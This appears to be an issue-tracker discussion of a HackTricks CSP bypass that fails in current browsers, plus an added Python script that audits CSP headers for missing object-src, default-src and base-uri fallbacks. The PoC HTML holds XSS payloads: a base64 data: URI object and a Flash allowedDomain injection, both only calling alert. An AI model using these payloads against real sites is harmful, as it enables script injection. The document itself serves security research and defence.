CSP Bypass: "Lack of object-src and default-src" not working
Relating to this part of HackTricks.
The bypass shown here doesn't work on either the latest Chrome or Firefox. Is there any source where this came from?
PoC:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
<meta http-equiv="Content-Security-Policy" content="script-src 'self' ;">
</head>
<body>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
</body>
</html>
This results in "Content Security Policy: The page’s settings blocked the loading of a resource at inline (“script-src”)."
Yes, the third reference of that page brings you to https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d There you can find that technique (which I guess could no longer be working? I will try it).
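The policy gap the HackTricks entry is about is a fallback problem: `object-src` has no fallback other than `default-src`, so a policy that sets only `script-src` leaves plugin content (`<object>`, `<embed>`) unrestricted at the policy level, whatever a given browser then does with a `data:` document inside it. The following checker, added here as an example and not part of the HackTricks page or of this issue, parses a CSP header, resolves the CSP3 fallback chain for a directive, and reports which script-relevant directives end up unrestricted or overly permissive. The two policies at the bottom are constructed for illustration: the first is the one in the PoC above, the second is a hardened version of it.

```python
"""Added example: audit a Content-Security-Policy header for missing fallbacks.

The FALLBACKS table follows the CSP3 fetch-directive fallback rules: a directive
that is absent is governed by the next entry in its list, and if none of them is
present the resource type is not restricted by the policy at all.
"""

FALLBACKS = {
    "script-src": ["default-src"],
    "object-src": ["default-src"],          # nothing but default-src covers plugins
    "frame-src": ["child-src", "default-src"],
    "worker-src": ["child-src", "script-src", "default-src"],
    "img-src": ["default-src"],
    "style-src": ["default-src"],
    "connect-src": ["default-src"],
    "base-uri": [],                         # no fallback at all
}


def parse_csp(header):
    """Parse a CSP header value into {directive_name: [source expressions]}.

    Directives are ';'-separated; a repeated directive is ignored after its
    first occurrence, matching browser behaviour.
    """
    policy = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if not tokens:
            continue
        name = tokens[0].lower()
        if name not in policy:
            policy[name] = tokens[1:]
    return policy


def effective_sources(policy, directive):
    """Resolve the fallback chain for one directive.

    Returns (governing_directive, sources), or (None, None) when neither the
    directive nor any of its fallbacks is present, i.e. the resource type is
    unrestricted.
    """
    for name in [directive] + FALLBACKS.get(directive, []):
        if name in policy:
            return name, policy[name]
    return None, None


def audit(header):
    """Return findings for the directives that matter for script execution."""
    policy = parse_csp(header)
    findings = []
    for directive in ("script-src", "object-src", "base-uri"):
        governing, sources = effective_sources(policy, directive)
        if governing is None:
            findings.append(
                f"{directive}: unrestricted (directive absent and no fallback present)")
        elif "'unsafe-inline'" in sources or "*" in sources:
            findings.append(
                f"{directive}: permissive sources {sources} via {governing}")
    return findings


# Constructed policies: the PoC's header, and a hardened equivalent.
WEAK_POLICY = "script-src 'self' ;"
HARDENED_POLICY = "default-src 'none'; script-src 'self'; object-src 'none'; base-uri 'none'"

if __name__ == "__main__":
    for label, header in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(f"[{label}] {header}")
        for finding in audit(header) or ["no findings"]:
            print("   ", finding)
```

Run as a script it reports two findings for the PoC policy (`object-src` and `base-uri` unrestricted) and none for the hardened one. The checker only describes what the policy allows; whether a specific payload inside an `<object>` actually runs is a browser question, and as the issue reports, current Chrome and Firefox block the inline script in the `data:` document regardless. Shipping `object-src 'none'` (or a `default-src` that covers it) removes the dependence on that browser behaviour.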